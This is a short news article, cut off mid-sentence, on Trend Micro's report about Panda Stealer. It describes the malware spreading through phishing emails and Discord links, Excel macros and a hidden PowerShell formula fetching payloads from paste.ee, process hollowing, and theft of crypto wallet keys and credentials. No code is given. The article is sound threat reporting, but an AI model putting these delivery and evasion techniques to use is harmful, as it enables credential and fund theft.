Panda Stealer Spread Through Discord via Excel Files to Steal Cryptocurrency and VPN Credentials

Panda Stealer Spread Through Discord via Excel Files to Steal Cryptocurrency and VPN Credentials

A new cryptocurrency stealer variant is being spread through a global spam campaign and potentially through Discord channels. 

Dubbed Panda Stealer, Trend Micro researchers said this week that the malware has been found targeting individuals across countries including the US, Australia, Japan, and Germany. 


The malware begins its infection chain through phishing emails and samples uploaded to VirusTotal also indicate that victims have been downloading executables from malicious websites via Discord links. 


Panda Stealer's phishing emails pretend to be business quote requests. So far, two methods have been linked to the campaign: the first of which uses attached .XLSM documents that require victims to enable malicious macros.


If macros are permitted, a loader then downloads and executes the main stealer. 


In the second chain, an attached .XLS file contains an Excel formula that hides a PowerShell command. This command attempts to access a paste.ee URL to pull a PowerShell script to the victim's system and to then grab a fileless payload. 


"The CallByName export function in Visual Basic is used to call the load of a .NET assembly within memory from a paste.ee URL," Trend Micro says. "The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process and replaces it with its payload: the hex-encoded Panda Stealer binary from another paste.ee URL."

Once downloaded, Panda Stealer will attempt to detect keys and addresses associated with cryptocurrency wallets holding funds including Ethereum (ETH), Litecoin (LTC), Bytecoin (BCN), and Dash (DASH). In addition, the malware is able to take screenshots, exfiltrate system data, and steal information including browser cookies and crede ..

Support the originator by clicking the read the rest link below.